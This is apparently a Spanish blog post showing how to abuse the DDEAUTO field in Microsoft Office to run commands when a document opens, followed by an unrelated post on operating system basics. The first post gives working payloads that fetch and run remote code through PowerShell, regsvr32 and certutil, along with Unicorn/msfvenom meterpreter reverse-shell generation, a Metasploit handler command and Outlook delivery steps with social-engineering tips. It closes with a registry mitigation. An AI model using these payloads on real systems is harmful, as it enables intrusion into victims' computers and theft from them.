Infectando Office de Windows con DDEAUTO

Infectando Office de Windows con DDEAUTO

  noviembre 28, 2017    Jesse Victor Barrios

---

Hace unos días se descubrió una vulnerabilidad que puede desencadenar la ejecución de comandos en Office, sin el uso de macros, cuando alguien abre un documento de Office especialmente diseñado. Aunque se necesita un poco de ingeniería social para que la víctima haga clic en "sí" en los primeros 2 de 3 cuadros de mensaje, la mayoría de los usuarios finales son engañados fácilmente. Descubrieron que al abusar de los parámetros de la función DDEAUTO podían usar powershell para descargar cargas maliciosas de forma remota. DDE es un mecanismo heredado de Comunicación entre Procesos (IPC) que data de 1987, que establece un enlace de intercambio dinámico de datos (DDE) con un documento creado en otro programa basado en Microsoft Windows. SensePost descubrió que, en lugar de especificar una aplicación como Excel, un atacante puede especificar parámetros arbitrarios de otra aplicación como primer parámetro y argumentos citados como el segundo parámetro (que no puede exceder 255 bytes).

La prueba rápida y fácil:

Abra un nuevo documento de Word, presione la tecla CTRL + F9, y pegue esto entre los corchetes {} y luego guarde el archivo

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

Deberías tener algo similar que se parece a la imagen de arriba.

Payloads.

 Aunque ejecutar la calculadora es lindo y todo con fines de demostración, puede hacer más cosas maliciosas para ejecutar cargas maliciosas en un sistema de destino.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll " 

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

También existe un script bash que usa CactusTorch para generar automáticamente payloads de conexión inversa en meterpreter, ya sea mediante TCP/HTTP/HTTPS y embebidos en lenguajes vbs/hta/js que puede insertar en documentos de Word para probar.

https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

También puedes ofuscar los contenidos del mensaje de alerta promoviendo tus intentos de ingeniería social para engañar al usuario para que haga clic en "sí".
 

DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Aunque los scripts de powershell webdl son más fáciles de hacer, es posible que desee tener un payload todo en un solo documento, por lo que no llamará a su binario a través de la red. Dave Kennedy actualizó su script en python Unicorn para generar payloads con msfvenom que codifica/decodifica en base64 cuando se activa el DDEAUTO.

Abra una consola en GNU/Linux y ejecute lo siguiente:

IP=`ip -4 addr show $iface | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt 

Nota: Debe reemplazar $iface por la interfaz que desee usar, puedes verlas usando el comando ip link.
 
Pegue el payload generado con el comando "cat" en Word y guárdelo, luego envíela a su destino. Luego, en una nueva terminal, abra su metereter para recibir algunas shells inversas.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* Si necesita su IP externa, cambie la primera línea de código a:

IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook.

También puede obtener shells con un mensaje de correo electrónico de texto enriquecido de Outlook, la única advertencia en Outlook 2013/2016 es que necesita incrustar una imagen/gráfico u objeto primero antes de agregar el payload DDEAUTO.

Abra el documento de Word, presione la tecla CTRL + F9 y pegue su payload entre los corchetes {}, luego abra un nuevo mensaje de correo electrónico de Outlook. Vaya a la pestaña Formato de texto y cambie el mensaje a formato de texto enriquecido.

En el cuerpo del mensaje, copie y pegue cualquier imagen en el cuerpo.

De su documento Word, copie el payload y luego péguelo en el cuerpo del correo electrónico. Ingrese el destinatario, etc. y envíe. Obtendrá los mensajes DDE, solo dígales "no". Cuando su destinatario recibe el correo electrónico, no se activará hasta que presione responder. Si presionan "sí" en las primeras 2 casillas de mensajes, entonces ejecutará su payload.

Mitigaciones:

Se ha probado que esto funciona en archivos doc(x/m), dot(x/m), rtf, Word xml, draft msg & oft. Aunque el análisis subyacente que utiliza Word desencadena este comportamiento cuando se abren estos tipos de archivos, Microsoft respondió que se trata de una característica y que no se tomarán medidas adicionales para solucionarla (a menos que, por supuesto, los actuales ataques de ransomware y otros virus lo forcen).

A continuación dejaremos un archivo .reg que puede ser usado para desactivar DDEAUTO en tu sistema.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\WordMail]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options\WordMail]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options\WordMail]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Options]
"DisableEmbeddedFiles"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\OneNote\Options]
"DisableEmbeddedFiles"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options]
 "DontUpdateLinks"=dword:00000001
 "DDEAllowed"=dword:00000000
 "DDECleaned"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options]
 "DontUpdateLinks"=dword:00000001
 "DDEAllowed"=dword:00000000
 "DDECleaned"=dword:00000001
 "Options"=dword:00000117

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options]
 "DontUpdateLinks"=dword:00000001
 "DDEAllowed"=dword:00000000
 "DDECleaned"=dword:00000001
 "Options"=dword:00000117 

 

A continuación hay un video demostrativo que ha creado uno de nuestros usuarios.

Esperamos que esta publicación haya sido de utilidad, cualquier inquietud o sugerencia dejarla en los comentarios o bien, en los medios que indicamos a continuación. 

Síguenos en Facebook, Twitter, unete a nuestra charla en Riot, únete a IRC o únete a Telegram.

Fuentes: Willgenovese, Atheros_Lp

G

M

T

Detectar idiomaAfrikáansAlbanésAlemánÁrabeArmenioAzeríBengalíBielorrusoBirmanoBosnioBúlgaroCanarésCatalánCebuanoChecoChichewaChino (Simp)Chino (Trad)CincalésCoreanoCriollo haitianoCroataDanésEslovacoEslovenoEspañolEsperantoEstonioEuskeraFinlandésFrancésGalésGallegoGeorgianoGriegoGujaratiHausaHebreoHindiHmongHolandésHúngaroIgboIndonesioInglésIrlandésIslandésItalianoJaponésJavanésJemerKazajoLaoLatínLetónLituanoMacedonioMalayalamMalayoMalgacheMaltésMaoríMaratíMongolNepalíNoruegoPersaPolacoPortuguésPunjabíRumanoRusoSerbioSesotoSomalíSuajiliSuecoSundanésTagaloTailandésTamilTayikoTeluguTurcoUcranianoUrduUzbecoVietnamitaYidisYorubaZulú

AfrikáansAlbanésAlemánÁrabeArmenioAzeríBengalíBielorrusoBirmanoBosnioBúlgaroCanarésCatalánCebuanoChecoChichewaChino (Simp)Chino (Trad)CincalésCoreanoCriollo haitianoCroataDanésEslovacoEslovenoEspañolEsperantoEstonioEuskeraFinlandésFrancésGalésGallegoGeorgianoGriegoGujaratiHausaHebreoHindiHmongHolandésHúngaroIgboIndonesioInglésIrlandésIslandésItalianoJaponésJavanésJemerKazajoLaoLatínLetónLituanoMacedonioMalayalamMalayoMalgacheMaltésMaoríMaratíMongolNepalíNoruegoPersaPolacoPortuguésPunjabíRumanoRusoSerbioSesotoSomalíSuajiliSuecoSundanésTagaloTailandésTamilTayikoTeluguTurcoUcranianoUrduUzbecoVietnamitaYidisYorubaZulú

La función de sonido está limitada a 200 caracteres

Opciones : Historia : Feedback : Donate

Cerrar

Leer más

Sistemas Operativos

Sistemas Operativos

  agosto 31, 2016    Unknown

---

Muy buen día, querido lector, este es nuestro primer post, en el que vamos a tratar las cosas básicas, acerca de los sistemas operativos (OS, por sus siglas en ingles) y algo de su historia.

Principales diferencias, ventajas y desventajas.

Unix: es un sistema operativo portable, multitarea y multiusuario; desarrollado, en principio, en 1969, por un grupo de empleados de los laboratorios Bell de AT&T, este sistema se diferencia a Windows por los sistemas de ficheros y los formatos de disco. Unix no cuenta con un disco "C:" o un disco "D:", sino que todo se maneja desde el fichero raíz que es "/". Por ejemplo: Unix ubica sus ficheros de inicio en "/boot/", sus ejecutables indispensables en "/sbin", ejecutables del usuario en "/bin" y "/usr/bin". Unix es un sistema muy complejo que ofrece alta seguridad y protección contra virus, aun sin tener un antivirus instalado.

Algunos comandos básicos de UNIX son:

• Navegación/creación de directorios/archivos: ls cd pwd mkdir rm rmdir cp.
• Edición/visión de archivos: touch more ed vi nano.
• Procesamiento de textos: echo cat grep sort uniq sed awk tail head.
• Comparación de archivos: comm cmp diff patch.
• Administración del sistema: chmod chown ps find xargs sd w who.
• Comunicación: mail telnet ssh ftp finger rlogin.
• Shells: sh csh ksh.
• Documentación: man.

GNU/Linux: Es un Sistema operativo basado en Unix, que nace de la combinación del núcleo o kernel libre similar a Unix denominado Linux con el sistema operativo GNU. Su desarrollo es uno de los ejemplos más prominentes de software libre; todo su código fuente puede ser utilizado, modificado y redistribuido libremente por cualquiera bajo los términos de la GPL (Licencia Pública General de GNU,) y otra serie de licencias libres. Se diferencia de Unix principalmente por que GNU/Linux puede funcionar tanto en entorno gráfico como en modo consola. La consola es común en distribuciones para servidores, mientras que la interfaz gráfica está orientada al usuario final tanto de hogar como empresarial. Asimismo, también existen los entornos de escritorio, que son un conjunto de programas conformado por ventanas, iconos y muchas aplicaciones que facilitan la utilización del computador. Los entornos de escritorio más populares en GNU/Linux son: GNOME, KDE SC, LXDE, Xfce, Unity, MATE y Cinnamon. Un entorno de escritorio en GNU/Linux es como el entorno gráfico de Windows, en donde puedes hacer uso del mouse y puedes ver las carpetas y archivos de manera clara y ordenada. Los comandos para GNU/Linux son los mismos que para Unix.

GNU/Linux disfruta de una situación cercana a la ausencia de diversos tipos de "malware" y "spyware" como virus, troyanos... que principalmente afectan a los usuarios del sistema operativo Windows de Microsoft.

Macintosh o Mac: Tambien basado en Unix, Macintosh abreviado como Mac, es la línea de computadoras personales diseñada, desarrollada y comercializada por Apple Inc. En sus inicios fue una alternativa económica y doméstica al Lisa, un avanzado microcomputador empresarial, cuya línea de desarrollo fue absorbida por la línea Macintosh. El Mac terminó por convertirse en la línea estándar de desarrollo de los computadores de Apple, al desaparecer la línea evolutiva del Apple II. Al igual que los dos sistemas anteriores, Macintosh es un sistema poco vulnerable por virus, troyanos, etc. Suele usar los mismos comandos que Unix y GNU/Linux, pero al igual que Microsoft Windows sus programas vienen con todas las dependencias incluidas en el mismo para que solo sea dar  en "Siguiente" - "Siguiente" - "Instalar".

Microsoft Windows: Es el nombre de una familia de distribuciones de software para PC, smartphone, servidores y sistemas empotrados, desarrollados y vendidos por Microsoft y disponibles para múltiples arquitecturas, tales como x86 y ARM. La versión más reciente de Windows es Windows 10 para equipos de escritorio, Windows Server 2012 para servidores y Windows Phone 8 y 8.1 para dispositivos móviles. La primera versión en español fue Windows 3.0. Una de las principales críticas que reciben los sistemas operativos Windows es la debilidad del sistema en lo que a seguridad se refiere y el alto índice de vulnerabilidades críticas. El propio Bill Gates, fundador de Microsoft, ha asegurado en repetidas ocasiones que la seguridad es objetivo primordial para su empresa. Microsoft Windows esta basado en MS-DOS.

Es importante conocer las características básicas de cada sistema así como sus funcionamientos, con ellos puedes entender las posibilidades de cada uno y tener un mejor desarrollo dentro de los mismos. Esperamos que les haya sido de su agrado esperando sus comentarios. Saludos!!

Leer más